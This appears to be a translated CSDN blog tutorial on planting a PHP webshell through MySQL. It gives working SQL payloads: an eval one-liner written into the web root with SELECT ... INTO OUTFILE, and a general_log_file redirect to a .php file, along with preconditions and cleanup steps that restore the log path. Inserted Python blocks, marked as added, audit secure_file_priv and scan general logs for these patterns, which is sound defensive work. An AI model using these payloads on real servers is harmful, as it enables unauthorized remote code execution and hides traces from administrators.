[Getshell] MySQL upload webshell


One, writing the shell directly with SELECT ... INTO OUTFILE

1. Conditions of use
  • The MySQL account must have write permission on the web directory and the query must be able to use single quotes (in practice, root)
  • The absolute path of the website must be known (phpinfo, a PHP probe page, error messages, etc.)
  • secure_file_priv must have no specific value (empty)
2. View the secure_file_priv value
show global variables like '%secure%';

About the secure_file_priv setting:

secure_file_priv restricts the directory in which LOAD DATA, SELECT ... INTO OUTFILE / INTO DUMPFILE and LOAD_FILE() are allowed to write or read files.

When secure_file_priv is NULL, mysqld does not allow import or export at all, so privilege escalation is impossible.
When secure_file_priv is /tmp/, mysqld only allows import and export under the /tmp/ directory, so privilege escalation is likewise impossible.
When secure_file_priv has no specific value (empty), mysqld places no restriction on import or export, and privilege escalation is possible.

secure_file_priv is a read-only variable and can only be changed through the configuration file. If the administrator has not configured it, we cannot write the shell; since this is our own test environment, we simply set it ourselves.

It is configured in the MySQL configuration file my.ini:


3. Write the one-line shell
select '<?php @eval($_POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

Note that the path separator here must be written as "\\" (an escaped backslash).

Check whether a.php has been created in the web root and whether its content is the one-liner.

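The three secure_file_priv states above are the whole precondition for section One, so the natural defensive check is an audit that classifies the value and tells you whether INTO OUTFILE could reach the web root. The following is an added example written for this page, not code from the original post: it reads the value either as SHOW GLOBAL VARIABLES returns it or from a my.ini fragment, and the sample my.ini and the web root path are constructed to mirror the post's phpStudy layout.

```python
"""Audit the secure_file_priv setting that section One depends on.

Added example, not code from the original post. It reads the value as
returned by SHOW GLOBAL VARIABLES LIKE 'secure_file_priv' (or from my.ini)
and reports whether SELECT ... INTO OUTFILE could reach the web root.
The my.ini fragment and the web root path are constructed sample data.
"""
import configparser
import re


def _norm(path):
    """Normalise Windows or POSIX paths for a case-insensitive prefix compare."""
    return re.sub(r"/+", "/", path.replace("\\", "/")).rstrip("/").lower()


def classify_secure_file_priv(value):
    """Map the variable value to the three states described in the post."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"       # LOAD DATA / INTO OUTFILE / LOAD_FILE() all refused
    if value.strip() == "":
        return "unrestricted"   # files can be written anywhere the OS user may write
    return "restricted"         # confined to the named directory and its subtree


def webroot_is_reachable(value, webroot):
    """True if INTO OUTFILE may write under `webroot` with this setting."""
    state = classify_secure_file_priv(value)
    if state == "disabled":
        return False
    if state == "unrestricted":
        return True
    allowed, target = _norm(value), _norm(webroot)
    return target == allowed or target.startswith(allowed + "/")


def read_option_file_value(ini_text):
    """Return secure_file_priv from my.ini/my.cnf text, or None if absent.

    MySQL accepts both secure_file_priv and secure-file-priv spellings, and an
    empty value is usually written as "" in the option file.
    """
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.read_string(ini_text)
    if not cp.has_section("mysqld"):
        return None
    for key in ("secure_file_priv", "secure-file-priv"):
        if cp.has_option("mysqld", key):
            raw = (cp.get("mysqld", key) or "").strip()
            return raw.strip("\"'")
    return None


def audit_option_file(ini_text, webroot):
    """Summarise the risk and, if the web root is exposed, the line to change."""
    value = read_option_file_value(ini_text)
    if value is None:
        state = "not set (server build default applies)"
        exposed = False
    else:
        state = classify_secure_file_priv(value)
        exposed = webroot_is_reachable(value, webroot)
    return {
        "value": value,
        "state": state,
        "webroot_writable": exposed,
        # NULL disables file import/export entirely; a dedicated directory
        # outside the web root is the alternative when LOAD DATA is needed.
        "recommended": "secure_file_priv = NULL" if exposed else None,
    }


# Constructed my.ini fragment mirroring the post's phpStudy layout (assumed paths).
SAMPLE_INI = """\
[client]
port=3306

[mysqld]
basedir=D:/phpStudy/PHPTutorial/MySQL
datadir=D:/phpStudy/PHPTutorial/MySQL/data
secure_file_priv=""
general_log=0
"""
SAMPLE_WEBROOT = r"D:\phpStudy\PHPTutorial\WWW"   # assumed web root

if __name__ == "__main__":
    print(audit_option_file(SAMPLE_INI, SAMPLE_WEBROOT))
```

Because the variable is read-only at runtime, the fix always lives in the option file; the audit therefore reports the line to change rather than trying to SET anything.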

Two, using the global log to write the shell

1. View the configuration

Check the general log status of MySQL. It is off by default because the log grows very large and is a significant resource overhead, so do not enable it in a production environment!

show variables like '%general%';


2. Turn on general_log mode

Turning on general_log makes MySQL record every statement a user enters, saving it to a file such as D:\phpStudy\PHPTutorial\MySQL\data\WIN-83V1721VG9V.log. This is the log-file technique that is often talked about: after turning on general_log, change general_log_file to a custom .php file under the website's path, write the one-line Trojan into the log through a query, and then use it from there.

Note: before changing the log path, record the original path first, and restore it after obtaining the shell.

set global general_log = on;


3. Point the log file at the shell path
set global general_log_file='D:\\phpStudy\\PHPTutorial\\WWW\\hp.php';
4. Write to the shell

Because logging is on, every executed SQL statement is written to the log, including this one:

select '<?php eval($_POST[cmd]);?>'


5. Clean up
set global general_log_file='D:\\phpStudy\\PHPTutorial\\MySQL\\data\\WIN-83V1721VG9V.log';   -- restore the original log file path

set global general_log = off;   -- turn the global log off again
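Both techniques on this page leave a very recognisable trail in the server's own query stream: an INTO OUTFILE aimed at a web directory, a runtime change of general_log_file to a .php path, and a PHP open tag inside a SELECT. The following detection routine is an added example written for this page, not code from the original post; it scans text in MySQL general-log format (time, thread id, command, argument) and flags those patterns. The log excerpt is constructed, and the web root list is an assumption a deployment would replace with its own.

```python
"""Detection logic for the two file-write patterns this post walks through:
SELECT ... INTO OUTFILE aimed at a web directory, and general_log_file being
re-pointed at a script file so that logged queries land in a .php file.

Added example for defenders, not code from the original post. The log text is
constructed in MySQL general-log format (time, thread id, command, argument)
and the web roots are assumed.
"""
import re

WEB_ROOTS = [r"D:\phpStudy\PHPTutorial\WWW", "/var/www/html"]   # assumed web roots
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")

_OUTFILE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'([^']*)'", re.I)
_LOGFILE = re.compile(r"\bSET\s+(?:GLOBAL|PERSIST)\s+general_log_file\s*=\s*'([^']*)'", re.I)
_LOGON = re.compile(r"\bSET\s+(?:GLOBAL|PERSIST)\s+general_log\s*=\s*(?:ON|1)\b", re.I)
_PHPTAG = re.compile(r"<\?php", re.I)
_LOGLINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")


def _norm(path):
    """Normalise Windows/POSIX paths (and SQL-escaped backslashes) for prefix compares."""
    return re.sub(r"/+", "/", path.replace("\\", "/")).rstrip("/").lower()


def under_web_root(path, roots=WEB_ROOTS):
    p = _norm(path)
    return any(p == _norm(r) or p.startswith(_norm(r) + "/") for r in roots)


def is_script_path(path):
    return path.lower().endswith(SCRIPT_EXT)


def classify_statement(sql):
    """Return the reasons a single SQL statement is suspicious (empty list if clean)."""
    reasons = []
    m = _OUTFILE.search(sql)
    if m:
        target = m.group(1)
        if under_web_root(target):
            reasons.append("INTO OUTFILE/DUMPFILE targets a web root: " + target)
        elif is_script_path(target):
            reasons.append("INTO OUTFILE/DUMPFILE writes a script file: " + target)
    m = _LOGFILE.search(sql)
    if m:
        target = m.group(1)
        if under_web_root(target) or is_script_path(target):
            reasons.append("general_log_file redirected to " + target)
    if _LOGON.search(sql):
        reasons.append("general_log switched on at runtime")
    if _PHPTAG.search(sql):
        reasons.append("PHP open tag inside SQL text")
    return reasons


def scan_general_log(text):
    """Walk general-log lines and return (thread_id, reasons) for each hit."""
    findings = []
    for line in text.splitlines():
        m = _LOGLINE.match(line)
        if not m or m.group(3) != "Query":
            continue
        reasons = classify_statement(m.group(4))
        if reasons:
            findings.append((int(m.group(2)), reasons))
    return findings


# Constructed general-log excerpt; thread 12 replays the post's steps, 13 is benign.
SAMPLE_LOG = (
    "2020-10-20T02:11:05.123456Z\t   12 Connect\troot@localhost on  using TCP/IP\n"
    "2020-10-20T02:11:06.000000Z\t   12 Query\tshow variables like '%general%'\n"
    "2020-10-20T02:11:07.000000Z\t   12 Query\tset global general_log = on\n"
    "2020-10-20T02:11:08.000000Z\t   12 Query\tset global general_log_file="
    "'D:\\\\phpStudy\\\\PHPTutorial\\\\WWW\\\\hp.php'\n"
    "2020-10-20T02:11:09.000000Z\t   12 Query\tselect '<?php echo 1; ?>'\n"
    "2020-10-20T02:12:00.000000Z\t   13 Query\tselect id, name from users where id = 3\n"
    "2020-10-20T02:20:00.000000Z\t   14 Query\tselect 'x' into outfile '/var/www/html/a.php'\n"
)

if __name__ == "__main__":
    for thread_id, reasons in scan_general_log(SAMPLE_LOG):
        print(thread_id, "; ".join(reasons))
```

The same classify_statement() can be run over audit-plugin or proxy query logs; the general-log parser is only the thinnest adapter around it. Note that a restore of the original log path at the end (the page's own step 5) does not undo the earlier entries, so the redirect itself remains visible to this scan.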


Origin blog.csdn.net/weixin_44032232/article/details/109175795